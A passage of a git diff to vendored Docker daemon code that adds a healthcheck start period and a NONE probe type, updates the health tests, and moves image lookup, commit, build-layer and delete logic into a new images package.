"execID": execConfig.ID, + } + d.LogContainerEventWithAttributes(cntr, "exec_create: "+execConfig.Entrypoint+" "+strings.Join(execConfig.Args, " "), attributes) output := &limitedBuffer{} - err := d.ContainerExecStart(ctx, execConfig.ID, nil, output, output) + err = d.ContainerExecStart(ctx, execConfig.ID, nil, output, output) if err != nil { return nil, err } @@ -92,7 +103,7 @@ func (p *cmdProbe) run(ctx context.Context, d *Daemon, container *container.Cont return nil, err } if info.ExitCode == nil { - return nil, fmt.Errorf("Healthcheck for container %s has no exit code!", container.ID) + return nil, fmt.Errorf("healthcheck for container %s has no exit code", cntr.ID) } // Note: Go's json package will handle invalid UTF-8 for us out := output.String() @@ -121,7 +132,7 @@ func handleProbeResult(d *Daemon, c *container.Container, result *types.Healthch } h := c.State.Health - oldStatus := h.Status + oldStatus := h.Status() if len(h.Log) >= maxLogEntries { h.Log = append(h.Log[len(h.Log)+1-maxLogEntries:], result) @@ -131,18 +142,43 @@ func handleProbeResult(d *Daemon, c *container.Container, result *types.Healthch if result.ExitCode == exitStatusHealthy { h.FailingStreak = 0 - h.Status = types.Healthy - } else { - // Failure (including invalid exit code) - h.FailingStreak++ - if h.FailingStreak >= retries { - h.Status = types.Unhealthy + h.SetStatus(types.Healthy) + } else { // Failure (including invalid exit code) + shouldIncrementStreak := true + + // If the container is starting (i.e. we never had a successful health check) + // then we check if we are within the start period of the container in which + // case we do not increment the failure streak. + if h.Status() == types.Starting { + startPeriod := timeoutWithDefault(c.Config.Healthcheck.StartPeriod, defaultStartPeriod) + timeSinceStart := result.Start.Sub(c.State.StartedAt) + + // If still within the start period, then don't increment failing streak. + if timeSinceStart < startPeriod { + shouldIncrementStreak = false + } + } + + if shouldIncrementStreak { + h.FailingStreak++ + + if h.FailingStreak >= retries { + h.SetStatus(types.Unhealthy) + } } // Else we're starting or healthy. Stay in that state. } - if oldStatus != h.Status { - d.LogContainerEvent(c, "health_status: "+h.Status) + // replicate Health status changes + if err := c.CheckpointTo(d.containersReplica); err != nil { + // queries will be inconsistent until the next probe runs or other state mutations + // checkpoint the container + logrus.Errorf("Error replicating health state for container %s: %v", c.ID, err) + } + + current := h.Status() + if oldStatus != current { + d.LogContainerEvent(c, "health_status: "+current) } } @@ -160,7 +196,7 @@ func monitor(d *Daemon, c *container.Container, stop chan struct{}, probe probe) logrus.Debugf("Running health check for container %s ...", c.ID) startTime := time.Now() ctx, cancelProbe := context.WithTimeout(context.Background(), probeTimeout) - results := make(chan *types.HealthcheckResult) + results := make(chan *types.HealthcheckResult, 1) go func() { healthChecksCounter.Inc() result, err := probe.run(ctx, d, c) @@ -183,8 +219,10 @@ func monitor(d *Daemon, c *container.Container, stop chan struct{}, probe probe) select { case <-stop: logrus.Debugf("Stop healthcheck monitoring for container %s (received while probing)", c.ID) - // Stop timeout and kill probe, but don't wait for probe to exit. cancelProbe() + // Wait for probe to exit (it might take a while to respond to the TERM + // signal and we don't want dying probes to pile up). + <-results return case result := <-results: handleProbeResult(d, c, result, stop) @@ -219,6 +257,8 @@ func getProbe(c *container.Container) probe { return &cmdProbe{shell: false} case "CMD-SHELL": return &cmdProbe{shell: true} + case "NONE": + return nil default: logrus.Warnf("Unknown healthcheck type '%s' (expected 'CMD') in container %s", config.Test[0], c.ID) return nil @@ -259,11 +299,11 @@ func (d *Daemon) initHealthMonitor(c *container.Container) { d.stopHealthchecks(c) if h := c.State.Health; h != nil { - h.Status = types.Starting + h.SetStatus(types.Starting) h.FailingStreak = 0 } else { h := &container.Health{} - h.Status = types.Starting + h.SetStatus(types.Starting) c.State.Health = h } diff --git a/vendor/github.com/docker/docker/daemon/health_test.go b/vendor/github.com/docker/docker/daemon/health_test.go index 7e82115d43..db166317fd 100644 --- a/vendor/github.com/docker/docker/daemon/health_test.go +++ b/vendor/github.com/docker/docker/daemon/health_test.go @@ -1,4 +1,4 @@ -package daemon +package daemon // import "github.com/docker/docker/daemon" import ( "testing" @@ -14,31 +14,36 @@ import ( func reset(c *container.Container) { c.State = &container.State{} c.State.Health = &container.Health{} - c.State.Health.Status = types.Starting + c.State.Health.SetStatus(types.Starting) } func TestNoneHealthcheck(t *testing.T) { c := &container.Container{ - CommonContainer: container.CommonContainer{ - ID: "container_id", - Name: "container_name", - Config: &containertypes.Config{ - Image: "image_name", - Healthcheck: &containertypes.HealthConfig{ - Test: []string{"NONE"}, - }, + ID: "container_id", + Name: "container_name", + Config: &containertypes.Config{ + Image: "image_name", + Healthcheck: &containertypes.HealthConfig{ + Test: []string{"NONE"}, }, - State: &container.State{}, }, + State: &container.State{}, + } + store, err := container.NewViewDB() + if err != nil { + t.Fatal(err) + } + daemon := &Daemon{ + containersReplica: store, } - daemon := &Daemon{} daemon.initHealthMonitor(c) if c.State.Health != nil { - t.Errorf("Expecting Health to be nil, but was not") + t.Error("Expecting Health to be nil, but was not") } } +// FIXME(vdemeester) This takes around 3s… This is *way* too long func TestHealthStates(t *testing.T) { e := events.New() _, l, _ := e.Subscribe() @@ -57,16 +62,21 @@ func TestHealthStates(t *testing.T) { } c := &container.Container{ - CommonContainer: container.CommonContainer{ - ID: "container_id", - Name: "container_name", - Config: &containertypes.Config{ - Image: "image_name", - }, + ID: "container_id", + Name: "container_name", + Config: &containertypes.Config{ + Image: "image_name", }, } + + store, err := container.NewViewDB() + if err != nil { + t.Fatal(err) + } + daemon := &Daemon{ - EventsService: e, + EventsService: e, + containersReplica: store, } c.Config.Healthcheck = &containertypes.HealthConfig{ @@ -101,8 +111,8 @@ func TestHealthStates(t *testing.T) { handleResult(c.State.StartedAt.Add(20*time.Second), 1) handleResult(c.State.StartedAt.Add(40*time.Second), 1) - if c.State.Health.Status != types.Starting { - t.Errorf("Expecting starting, but got %#v\n", c.State.Health.Status) + if status := c.State.Health.Status(); status != types.Starting { + t.Errorf("Expecting starting, but got %#v\n", status) } if c.State.Health.FailingStreak != 2 { t.Errorf("Expecting FailingStreak=2, but got %d\n", c.State.Health.FailingStreak) @@ -115,4 +125,30 @@ func TestHealthStates(t *testing.T) { if c.State.Health.FailingStreak != 0 { t.Errorf("Expecting FailingStreak=0, but got %d\n", c.State.Health.FailingStreak) } + + // Test start period + + reset(c) + c.Config.Healthcheck.Retries = 2 + c.Config.Healthcheck.StartPeriod = 30 * time.Second + + handleResult(c.State.StartedAt.Add(20*time.Second), 1) + if status := c.State.Health.Status(); status != types.Starting { + t.Errorf("Expecting starting, but got %#v\n", status) + } + if c.State.Health.FailingStreak != 0 { + t.Errorf("Expecting FailingStreak=0, but got %d\n", c.State.Health.FailingStreak) + } + handleResult(c.State.StartedAt.Add(50*time.Second), 1) + if status := c.State.Health.Status(); status != types.Starting { + t.Errorf("Expecting starting, but got %#v\n", status) + } + if c.State.Health.FailingStreak != 1 { + t.Errorf("Expecting FailingStreak=1, but got %d\n", c.State.Health.FailingStreak) + } + handleResult(c.State.StartedAt.Add(80*time.Second), 0) + expect("health_status: healthy") + if c.State.Health.FailingStreak != 0 { + t.Errorf("Expecting FailingStreak=0, but got %d\n", c.State.Health.FailingStreak) + } } diff --git a/vendor/github.com/docker/docker/daemon/image.go b/vendor/github.com/docker/docker/daemon/image.go deleted file mode 100644 index 32a8d77432..0000000000 --- a/vendor/github.com/docker/docker/daemon/image.go +++ /dev/null @@ -1,76 +0,0 @@ -package daemon - -import ( - "fmt" - - "github.com/docker/docker/builder" - "github.com/docker/docker/image" - "github.com/docker/docker/pkg/stringid" - "github.com/docker/docker/reference" -) - -// ErrImageDoesNotExist is error returned when no image can be found for a reference. -type ErrImageDoesNotExist struct { - RefOrID string -} - -func (e ErrImageDoesNotExist) Error() string { - return fmt.Sprintf("no such id: %s", e.RefOrID) -} - -// GetImageID returns an image ID corresponding to the image referred to by -// refOrID. -func (daemon *Daemon) GetImageID(refOrID string) (image.ID, error) { - id, ref, err := reference.ParseIDOrReference(refOrID) - if err != nil { - return "", err - } - if id != "" { - if _, err := daemon.imageStore.Get(image.IDFromDigest(id)); err != nil { - return "", ErrImageDoesNotExist{refOrID} - } - return image.IDFromDigest(id), nil - } - - if id, err := daemon.referenceStore.Get(ref); err == nil { - return image.IDFromDigest(id), nil - } - - // deprecated: repo:shortid https://github.com/docker/docker/pull/799 - if tagged, ok := ref.(reference.NamedTagged); ok { - if tag := tagged.Tag(); stringid.IsShortID(stringid.TruncateID(tag)) { - if id, err := daemon.imageStore.Search(tag); err == nil { - for _, namedRef := range daemon.referenceStore.References(id.Digest()) { - if namedRef.Name() == ref.Name() { - return id, nil - } - } - } - } - } - - // Search based on ID - if id, err := daemon.imageStore.Search(refOrID); err == nil { - return id, nil - } - - return "", ErrImageDoesNotExist{refOrID} -} - -// GetImage returns an image corresponding to the image referred to by refOrID. -func (daemon *Daemon) GetImage(refOrID string) (*image.Image, error) { - imgID, err := daemon.GetImageID(refOrID) - if err != nil { - return nil, err - } - return daemon.imageStore.Get(imgID) -} - -// GetImageOnBuild looks up a Docker image referenced by `name`. -func (daemon *Daemon) GetImageOnBuild(name string) (builder.Image, error) { - img, err := daemon.GetImage(name) - if err != nil { - return nil, err - } - return img, nil -} diff --git a/vendor/github.com/docker/docker/daemon/image_tag.go b/vendor/github.com/docker/docker/daemon/image_tag.go deleted file mode 100644 index 36fa3b462e..0000000000 --- a/vendor/github.com/docker/docker/daemon/image_tag.go +++ /dev/null @@ -1,37 +0,0 @@ -package daemon - -import ( - "github.com/docker/docker/image" - "github.com/docker/docker/reference" -) - -// TagImage creates the tag specified by newTag, pointing to the image named -// imageName (alternatively, imageName can also be an image ID). -func (daemon *Daemon) TagImage(imageName, repository, tag string) error { - imageID, err := daemon.GetImageID(imageName) - if err != nil { - return err - } - - newTag, err := reference.WithName(repository) - if err != nil { - return err - } - if tag != "" { - if newTag, err = reference.WithTag(newTag, tag); err != nil { - return err - } - } - - return daemon.TagImageWithReference(imageID, newTag) -} - -// TagImageWithReference adds the given reference to the image ID provided. -func (daemon *Daemon) TagImageWithReference(imageID image.ID, newTag reference.Named) error { - if err := daemon.referenceStore.AddTag(newTag, imageID.Digest(), true); err != nil { - return err - } - - daemon.LogImageEvent(imageID.String(), newTag.String(), "tag") - return nil -} diff --git a/vendor/github.com/docker/docker/daemon/images/cache.go b/vendor/github.com/docker/docker/daemon/images/cache.go new file mode 100644 index 0000000000..3b433106e8 --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/images/cache.go @@ -0,0 +1,27 @@ +package images // import "github.com/docker/docker/daemon/images" + +import ( + "github.com/docker/docker/builder" + "github.com/docker/docker/image/cache" + "github.com/sirupsen/logrus" +) + +// MakeImageCache creates a stateful image cache. +func (i *ImageService) MakeImageCache(sourceRefs []string) builder.ImageCache { + if len(sourceRefs) == 0 { + return cache.NewLocal(i.imageStore) + } + + cache := cache.New(i.imageStore) + + for _, ref := range sourceRefs { + img, err := i.GetImage(ref) + if err != nil { + logrus.Warnf("Could not look up %s for cache resolution, skipping: %+v", ref, err) + continue + } + cache.Populate(img) + } + + return cache +} diff --git a/vendor/github.com/docker/docker/daemon/images/image.go b/vendor/github.com/docker/docker/daemon/images/image.go new file mode 100644 index 0000000000..79cc07c4fd --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/images/image.go @@ -0,0 +1,64 @@ +package images // import "github.com/docker/docker/daemon/images" + +import ( + "fmt" + + "github.com/docker/distribution/reference" + "github.com/docker/docker/errdefs" + "github.com/docker/docker/image" +) + +// ErrImageDoesNotExist is error returned when no image can be found for a reference. +type ErrImageDoesNotExist struct { + ref reference.Reference +} + +func (e ErrImageDoesNotExist) Error() string { + ref := e.ref + if named, ok := ref.(reference.Named); ok { + ref = reference.TagNameOnly(named) + } + return fmt.Sprintf("No such image: %s", reference.FamiliarString(ref)) +} + +// NotFound implements the NotFound interface +func (e ErrImageDoesNotExist) NotFound() {} + +// GetImage returns an image corresponding to the image referred to by refOrID. +func (i *ImageService) GetImage(refOrID string) (*image.Image, error) { + ref, err := reference.ParseAnyReference(refOrID) + if err != nil { + return nil, errdefs.InvalidParameter(err) + } + namedRef, ok := ref.(reference.Named) + if !ok { + digested, ok := ref.(reference.Digested) + if !ok { + return nil, ErrImageDoesNotExist{ref} + } + id := image.IDFromDigest(digested.Digest()) + if img, err := i.imageStore.Get(id); err == nil { + return img, nil + } + return nil, ErrImageDoesNotExist{ref} + } + + if digest, err := i.referenceStore.Get(namedRef); err == nil { + // Search the image stores to get the operating system, defaulting to host OS. + id := image.IDFromDigest(digest) + if img, err := i.imageStore.Get(id); err == nil { + return img, nil + } + } + + // Search based on ID + if id, err := i.imageStore.Search(refOrID); err == nil { + img, err := i.imageStore.Get(id) + if err != nil { + return nil, ErrImageDoesNotExist{ref} + } + return img, nil + } + + return nil, ErrImageDoesNotExist{ref} +} diff --git a/vendor/github.com/docker/docker/daemon/images/image_builder.go b/vendor/github.com/docker/docker/daemon/images/image_builder.go new file mode 100644 index 0000000000..ca7d0fda4a --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/images/image_builder.go @@ -0,0 +1,219 @@ +package images // import "github.com/docker/docker/daemon/images" + +import ( + "context" + "io" + + "github.com/docker/distribution/reference" + "github.com/docker/docker/api/types" + "github.com/docker/docker/api/types/backend" + "github.com/docker/docker/builder" + "github.com/docker/docker/image" + "github.com/docker/docker/layer" + "github.com/docker/docker/pkg/containerfs" + "github.com/docker/docker/pkg/stringid" + "github.com/docker/docker/pkg/system" + "github.com/docker/docker/registry" + "github.com/pkg/errors" +) + +type roLayer struct { + released bool + layerStore layer.Store + roLayer layer.Layer +} + +func (l *roLayer) DiffID() layer.DiffID { + if l.roLayer == nil { + return layer.DigestSHA256EmptyTar + } + return l.roLayer.DiffID() +} + +func (l *roLayer) Release() error { + if l.released { + return nil + } + if l.roLayer != nil { + metadata, err := l.layerStore.Release(l.roLayer) + layer.LogReleaseMetadata(metadata) + if err != nil { + return errors.Wrap(err, "failed to release ROLayer") + } + } + l.roLayer = nil + l.released = true + return nil +} + +func (l *roLayer) NewRWLayer() (builder.RWLayer, error) { + var chainID layer.ChainID + if l.roLayer != nil { + chainID = l.roLayer.ChainID() + } + + mountID := stringid.GenerateRandomID() + newLayer, err := l.layerStore.CreateRWLayer(mountID, chainID, nil) + if err != nil { + return nil, errors.Wrap(err, "failed to create rwlayer") + } + + rwLayer := &rwLayer{layerStore: l.layerStore, rwLayer: newLayer} + + fs, err := newLayer.Mount("") + if err != nil { + rwLayer.Release() + return nil, err + } + + rwLayer.fs = fs + + return rwLayer, nil +} + +type rwLayer struct { + released bool + layerStore layer.Store + rwLayer layer.RWLayer + fs containerfs.ContainerFS +} + +func (l *rwLayer) Root() containerfs.ContainerFS { + return l.fs +} + +func (l *rwLayer) Commit() (builder.ROLayer, error) { + stream, err := l.rwLayer.TarStream() + if err != nil { + return nil, err + } + defer stream.Close() + + var chainID layer.ChainID + if parent := l.rwLayer.Parent(); parent != nil { + chainID = parent.ChainID() + } + + newLayer, err := l.layerStore.Register(stream, chainID) + if err != nil { + return nil, err + } + // TODO: An optimization would be to handle empty layers before returning + return &roLayer{layerStore: l.layerStore, roLayer: newLayer}, nil +} + +func (l *rwLayer) Release() error { + if l.released { + return nil + } + + if l.fs != nil { + if err := l.rwLayer.Unmount(); err != nil { + return errors.Wrap(err, "failed to unmount RWLayer") + } + l.fs = nil + } + + metadata, err := l.layerStore.ReleaseRWLayer(l.rwLayer) + layer.LogReleaseMetadata(metadata) + if err != nil { + return errors.Wrap(err, "failed to release RWLayer") + } + l.released = true + return nil +} + +func newROLayerForImage(img *image.Image, layerStore layer.Store) (builder.ROLayer, error) { + if img == nil || img.RootFS.ChainID() == "" { + return &roLayer{layerStore: layerStore}, nil + } + // Hold a reference to the image layer so that it can't be removed before + // it is released + layer, err := layerStore.Get(img.RootFS.ChainID()) + if err != nil { + return nil, errors.Wrapf(err, "failed to get layer for image %s", img.ImageID()) + } + return &roLayer{layerStore: layerStore, roLayer: layer}, nil +} + +// TODO: could this use the regular daemon PullImage ? +func (i *ImageService) pullForBuilder(ctx context.Context, name string, authConfigs map[string]types.AuthConfig, output io.Writer, os string) (*image.Image, error) { + ref, err := reference.ParseNormalizedNamed(name) + if err != nil { + return nil, err + } + ref = reference.TagNameOnly(ref) + + pullRegistryAuth := &types.AuthConfig{} + if len(authConfigs) > 0 { + // The request came with a full auth config, use it + repoInfo, err := i.registryService.ResolveRepository(ref) + if err != nil { + return nil, err + } + + resolvedConfig := registry.ResolveAuthConfig(authConfigs, repoInfo.Index) + pullRegistryAuth = &resolvedConfig + } + + if err := i.pullImageWithReference(ctx, ref, os, nil, pullRegistryAuth, output); err != nil { + return nil, err + } + return i.GetImage(name) +} + +// GetImageAndReleasableLayer returns an image and releaseable layer for a reference or ID. +// Every call to GetImageAndReleasableLayer MUST call releasableLayer.Release() to prevent +// leaking of layers. +func (i *ImageService) GetImageAndReleasableLayer(ctx context.Context, refOrID string, opts backend.GetImageAndLayerOptions) (builder.Image, builder.ROLayer, error) { + if refOrID == "" { + if !system.IsOSSupported(opts.OS) { + return nil, nil, system.ErrNotSupportedOperatingSystem + } + layer, err := newROLayerForImage(nil, i.layerStores[opts.OS]) + return nil, layer, err + } + + if opts.PullOption != backend.PullOptionForcePull { + image, err := i.GetImage(refOrID) + if err != nil && opts.PullOption == backend.PullOptionNoPull { + return nil, nil, err + } + // TODO: shouldn't we error out if error is different from "not found" ? + if image != nil { + if !system.IsOSSupported(image.OperatingSystem()) { + return nil, nil, system.ErrNotSupportedOperatingSystem + } + layer, err := newROLayerForImage(image, i.layerStores[image.OperatingSystem()]) + return image, layer, err + } + } + + image, err := i.pullForBuilder(ctx, refOrID, opts.AuthConfig, opts.Output, opts.OS) + if err != nil { + return nil, nil, err + } + if !system.IsOSSupported(image.OperatingSystem()) { + return nil, nil, system.ErrNotSupportedOperatingSystem + } + layer, err := newROLayerForImage(image, i.layerStores[image.OperatingSystem()]) + return image, layer, err +} + +// CreateImage creates a new image by adding a config and ID to the image store. +// This is similar to LoadImage() except that it receives JSON encoded bytes of +// an image instead of a tar archive. +func (i *ImageService) CreateImage(config []byte, parent string) (builder.Image, error) { + id, err := i.imageStore.Create(config) + if err != nil { + return nil, errors.Wrapf(err, "failed to create image") + } + + if parent != "" { + if err := i.imageStore.SetParent(id, image.ID(parent)); err != nil { + return nil, errors.Wrapf(err, "failed to set parent %s", parent) + } + } + + return i.imageStore.Get(id) +} diff --git a/vendor/github.com/docker/docker/daemon/images/image_commit.go b/vendor/github.com/docker/docker/daemon/images/image_commit.go new file mode 100644 index 0000000000..4caba9f27b --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/images/image_commit.go @@ -0,0 +1,127 @@ +package images // import "github.com/docker/docker/daemon/images" + +import ( + "encoding/json" + "io" + + "github.com/docker/docker/api/types/backend" + "github.com/docker/docker/image" + "github.com/docker/docker/layer" + "github.com/docker/docker/pkg/ioutils" + "github.com/docker/docker/pkg/system" + "github.com/pkg/errors" +) + +// CommitImage creates a new image from a commit config +func (i *ImageService) CommitImage(c backend.CommitConfig) (image.ID, error) { + layerStore, ok := i.layerStores[c.ContainerOS] + if !ok { + return "", system.ErrNotSupportedOperatingSystem + } + rwTar, err := exportContainerRw(layerStore, c.ContainerID, c.ContainerMountLabel) + if err != nil { + return "", err + } + defer func() { + if rwTar != nil { + rwTar.Close() + } + }() + + var parent *image.Image + if c.ParentImageID == "" { + parent = new(image.Image) + parent.RootFS = image.NewRootFS() + } else { + parent, err = i.imageStore.Get(image.ID(c.ParentImageID)) + if err != nil { + return "", err + } + } + + l, err := layerStore.Register(rwTar, parent.RootFS.ChainID()) + if err != nil { + return "", err + } + defer layer.ReleaseAndLog(layerStore, l) + + cc := image.ChildConfig{ + ContainerID: c.ContainerID, + Author: c.Author, + Comment: c.Comment, + ContainerConfig: c.ContainerConfig, + Config: c.Config, + DiffID: l.DiffID(), + } + config, err := json.Marshal(image.NewChildImage(parent, cc, c.ContainerOS)) + if err != nil { + return "", err + } + + id, err := i.imageStore.Create(config) + if err != nil { + return "", err + } + + if c.ParentImageID != "" { + if err := i.imageStore.SetParent(id, image.ID(c.ParentImageID)); err != nil { + return "", err + } + } + return id, nil +} + +func exportContainerRw(layerStore layer.Store, id, mountLabel string) (arch io.ReadCloser, err error) { + rwlayer, err := layerStore.GetRWLayer(id) + if err != nil { + return nil, err + } + defer func() { + if err != nil { + layerStore.ReleaseRWLayer(rwlayer) + } + }() + + // TODO: this mount call is not necessary as we assume that TarStream() should + // mount the layer if needed. But the Diff() function for windows requests that + // the layer should be mounted when calling it. So we reserve this mount call + // until windows driver can implement Diff() interface correctly. + _, err = rwlayer.Mount(mountLabel) + if err != nil { + return nil, err + } + + archive, err := rwlayer.TarStream() + if err != nil { + rwlayer.Unmount() + return nil, err + } + return ioutils.NewReadCloserWrapper(archive, func() error { + archive.Close() + err = rwlayer.Unmount() + layerStore.ReleaseRWLayer(rwlayer) + return err + }), + nil +} + +// CommitBuildStep is used by the builder to create an image for each step in +// the build. +// +// This method is different from CreateImageFromContainer: +// * it doesn't attempt to validate container state +// * it doesn't send a commit action to metrics +// * it doesn't log a container commit event +// +// This is a temporary shim. Should be removed when builder stops using commit. +func (i *ImageService) CommitBuildStep(c backend.CommitConfig) (image.ID, error) { + container := i.containers.Get(c.ContainerID) + if container == nil { + // TODO: use typed error + return "", errors.Errorf("container not found: %s", c.ContainerID) + } + c.ContainerMountLabel = container.MountLabel + c.ContainerOS = container.OS + c.ParentImageID = string(container.ImageID) + return i.CommitImage(c) +} diff --git a/vendor/github.com/docker/docker/daemon/image_delete.go b/vendor/github.com/docker/docker/daemon/images/image_delete.go similarity index 72% rename from vendor/github.com/docker/docker/daemon/image_delete.go rename to vendor/github.com/docker/docker/daemon/images/image_delete.go index 3e3c142e9c..94d6f872dd 100644 --- a/vendor/github.com/docker/docker/daemon/image_delete.go +++ b/vendor/github.com/docker/docker/daemon/images/image_delete.go @@ -1,22 +1,24 @@ -package daemon +package images // import "github.com/docker/docker/daemon/images" import ( "fmt" "strings" "time" - "github.com/docker/docker/api/errors" + "github.com/docker/distribution/reference" "github.com/docker/docker/api/types" "github.com/docker/docker/container" + "github.com/docker/docker/errdefs" "github.com/docker/docker/image" "github.com/docker/docker/pkg/stringid" - "github.com/docker/docker/reference" + "github.com/docker/docker/pkg/system" + "github.com/pkg/errors" ) type conflictType int const ( - conflictDependentChild conflictType = (1 << iota) + conflictDependentChild conflictType = 1 << iota conflictRunningContainer conflictActiveReference conflictStoppedContainer @@ -58,19 +60,24 @@ const ( // meaning any delete conflicts will cause the image to not be deleted and the // conflict will not be reported. // -// FIXME: remove ImageDelete's dependency on Daemon, then move to the graph -// package. This would require that we no longer need the daemon to determine -// whether images are being used by a stopped or running container. -func (daemon *Daemon) ImageDelete(imageRef string, force, prune bool) ([]types.ImageDelete, error) { +func (i *ImageService) ImageDelete(imageRef string, force, prune bool) ([]types.ImageDeleteResponseItem, error) { start := time.Now() - records := []types.ImageDelete{} + records := []types.ImageDeleteResponseItem{} - imgID, err := daemon.GetImageID(imageRef) + img, err := i.GetImage(imageRef) if err != nil { - return nil, daemon.imageNotExistToErrcode(err) + return nil, err + } + if !system.IsOSSupported(img.OperatingSystem()) { + return nil, errors.Errorf("unable to delete image: %q", system.ErrNotSupportedOperatingSystem) } - repoRefs := daemon.referenceStore.References(imgID.Digest()) + imgID := img.ID() + repoRefs := i.referenceStore.References(imgID.Digest()) + + using := func(c *container.Container) bool { + return c.ImageID == imgID + } var removedRepositoryRef bool if !isImageIDPrefix(imgID.String(), imageRef) { @@ -79,32 +86,32 @@ func (daemon *Daemon) ImageDelete(imageRef string, force, prune bool) ([]types.I // true, there are multiple repository references to this // image, or there are no containers using the given reference. if !force && isSingleReference(repoRefs) { - if container := daemon.getContainerUsingImage(imgID); container != nil { + if container := i.containers.First(using); container != nil { // If we removed the repository reference then // this image would remain "dangling" and since // we really want to avoid that the client must // explicitly force its removal. - err := fmt.Errorf("conflict: unable to remove repository reference %q (must force) - container %s is using its referenced image %s", imageRef, stringid.TruncateID(container.ID), stringid.TruncateID(imgID.String())) - return nil, errors.NewRequestConflictError(err) + err := errors.Errorf("conflict: unable to remove repository reference %q (must force) - container %s is using its referenced image %s", imageRef, stringid.TruncateID(container.ID), stringid.TruncateID(imgID.String())) + return nil, errdefs.Conflict(err) } } - parsedRef, err := reference.ParseNamed(imageRef) + parsedRef, err := reference.ParseNormalizedNamed(imageRef) if err != nil { return nil, err } - parsedRef, err = daemon.removeImageRef(parsedRef) + parsedRef, err = i.removeImageRef(parsedRef) if err != nil { return nil, err } - untaggedRecord := types.ImageDelete{Untagged: parsedRef.String()} + untaggedRecord := types.ImageDeleteResponseItem{Untagged: reference.FamiliarString(parsedRef)} - daemon.LogImageEvent(imgID.String(), imgID.String(), "untag") + i.LogImageEvent(imgID.String(), imgID.String(), "untag") records = append(records, untaggedRecord) - repoRefs = daemon.referenceStore.References(imgID.Digest()) + repoRefs = i.referenceStore.References(imgID.Digest()) // If a tag reference was removed and the only remaining // references to the same repository are digest references, @@ -119,14 +126,14 @@ func (daemon *Daemon) ImageDelete(imageRef string, force, prune bool) ([]types.I } if !foundRepoTagRef { // Remove canonical references from same repository - remainingRefs := []reference.Named{} + var remainingRefs []reference.Named for _, repoRef := range repoRefs { if _, repoRefIsCanonical := repoRef.(reference.Canonical); repoRefIsCanonical && parsedRef.Name() == repoRef.Name() { - if _, err := daemon.removeImageRef(repoRef); err != nil { + if _, err := i.removeImageRef(repoRef); err != nil { return records, err } - untaggedRecord := types.ImageDelete{Untagged: repoRef.String()} + untaggedRecord := types.ImageDeleteResponseItem{Untagged: reference.FamiliarString(repoRef)} records = append(records, untaggedRecord) } else { remainingRefs = append(remainingRefs, repoRef) @@ -152,25 +159,25 @@ func (daemon *Daemon) ImageDelete(imageRef string, force, prune bool) ([]types.I if !force { c |= conflictSoft &^ conflictActiveReference } - if conflict := daemon.checkImageDeleteConflict(imgID, c); conflict != nil { + if conflict := i.checkImageDeleteConflict(imgID, c); conflict != nil { return nil, conflict } for _, repoRef := range repoRefs { - parsedRef, err := daemon.removeImageRef(repoRef) + parsedRef, err := i.removeImageRef(repoRef) if err != nil { return nil, err } - untaggedRecord := types.ImageDelete{Untagged: parsedRef.String()} + untaggedRecord := types.ImageDeleteResponseItem{Untagged: reference.FamiliarString(parsedRef)} - daemon.LogImageEvent(imgID.String(), imgID.String(), "untag") + i.LogImageEvent(imgID.String(), imgID.String(), "untag") records = append(records, untaggedRecord) } } } - if err := daemon.imageDeleteHelper(imgID, &records, force, prune, removedRepositoryRef); err != nil { + if err := i.imageDeleteHelper(imgID, &records, force, prune, removedRepositoryRef); err != nil { return nil, err } @@ -218,25 +225,18 @@ func isImageIDPrefix(imageID, possiblePrefix string) bool { return false } -// getContainerUsingImage returns a container that was created using the given -// imageID. Returns nil if there is no such container. -func (daemon *Daemon) getContainerUsingImage(imageID image.ID) *container.Container { - return daemon.containers.First(func(c *container.Container) bool { - return c.ImageID == imageID - }) -} - // removeImageRef attempts to parse and remove the given image reference from // this daemon's store of repository tag/digest references. The given // repositoryRef must not be an image ID but a repository name followed by an // optional tag or digest reference. If tag or digest is omitted, the default // tag is used. Returns the resolved image reference and an error. -func (daemon *Daemon) removeImageRef(ref reference.Named) (reference.Named, error) { - ref = reference.WithDefaultTag(ref) +func (i *ImageService) removeImageRef(ref reference.Named) (reference.Named, error) { + ref = reference.TagNameOnly(ref) + // Ignore the boolean value returned, as far as we're concerned, this // is an idempotent operation and it's okay if the reference didn't // exist in the first place. - _, err := daemon.referenceStore.Delete(ref) + _, err := i.referenceStore.Delete(ref) return ref, err } @@ -244,20 +244,20 @@ func (daemon *Daemon) removeImageRef(ref reference.Named) (reference.Named, erro // removeAllReferencesToImageID attempts to remove every reference to the given // imgID from this daemon's store of repository tag/digest references. Returns // on the first encountered error. Removed references are logged to this -// daemon's event service. An "Untagged" types.ImageDelete is added to the +// daemon's event service. An "Untagged" types.ImageDeleteResponseItem is added to the // given list of records. -func (daemon *Daemon) removeAllReferencesToImageID(imgID image.ID, records *[]types.ImageDelete) error { - imageRefs := daemon.referenceStore.References(imgID.Digest()) +func (i *ImageService) removeAllReferencesToImageID(imgID image.ID, records *[]types.ImageDeleteResponseItem) error { + imageRefs := i.referenceStore.References(imgID.Digest()) for _, imageRef := range imageRefs { - parsedRef, err := daemon.removeImageRef(imageRef) + parsedRef, err := i.removeImageRef(imageRef) if err != nil { return err } - untaggedRecord := types.ImageDelete{Untagged: parsedRef.String()} + untaggedRecord := types.ImageDeleteResponseItem{Untagged: reference.FamiliarString(parsedRef)} - daemon.LogImageEvent(imgID.String(), imgID.String(), "untag") + i.LogImageEvent(imgID.String(), imgID.String(), "untag") *records = append(*records, untaggedRecord) } @@ -284,6 +284,8 @@ func (idc *imageDeleteConflict) Error() string { return fmt.Sprintf("conflict: unable to delete %s (%s) - %s", stringid.TruncateID(idc.imgID.String()), forceMsg, idc.message) } +func (idc *imageDeleteConflict) Conflict() {} + // imageDeleteHelper attempts to delete the given image from this daemon. If // the image has any hard delete conflicts (child images or running containers // using the image) then it cannot be deleted. If the image has any soft delete @@ -295,15 +297,15 @@ func (idc *imageDeleteConflict) Error() string { // conflict is encountered, it will be returned immediately without deleting // the image. If quiet is true, any encountered conflicts will be ignored and // the function will return nil immediately without deleting the image. -func (daemon *Daemon) imageDeleteHelper(imgID image.ID, records *[]types.ImageDelete, force, prune, quiet bool) error { +func (i *ImageService) imageDeleteHelper(imgID image.ID, records *[]types.ImageDeleteResponseItem, force, prune, quiet bool) error { // First, determine if this image has any conflicts. Ignore soft conflicts // if force is true. c := conflictHard if !force { c |= conflictSoft } - if conflict := daemon.checkImageDeleteConflict(imgID, c); conflict != nil { - if quiet && 